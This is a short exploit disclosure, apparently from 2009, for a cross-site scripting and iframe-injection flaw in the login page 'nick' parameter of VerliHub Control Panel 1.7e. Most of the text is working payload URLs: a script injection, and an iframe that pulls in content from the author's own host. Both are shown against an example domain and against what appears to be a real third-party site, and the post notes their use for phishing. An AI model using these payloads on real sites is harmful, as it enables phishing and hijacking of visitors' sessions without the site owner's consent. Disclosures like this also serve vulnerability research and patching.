VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability

http://vhcp.verlihub-project.org

-6-05-2009

-Methodman - http://nemesis.te-home.net

-Example:-

Cross-site scripting vulnerability on login page

http://vhcp.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>


http://vhcp.com/index.php?page=login&nick="><iframe src=
http://nemesis.te-home.net/index.html?news></iframe>


-Proof of Concept:-

http://wiretransfers.net/index.php?page=login&nick="><script>alert("Vulnerable");</script>


http://wiretransfers.net/index.php?page=login&nick="><iframe src=
http://nemesis.te-home.net/index.html?news></iframe>


-Nice screen:-

http://img7.imageshack.us/img7/4660/vhcp.jpg

Vulnerability that can be used to perform phishing attacks

[so verlibug sucks++++ =))]

/teamelite 2009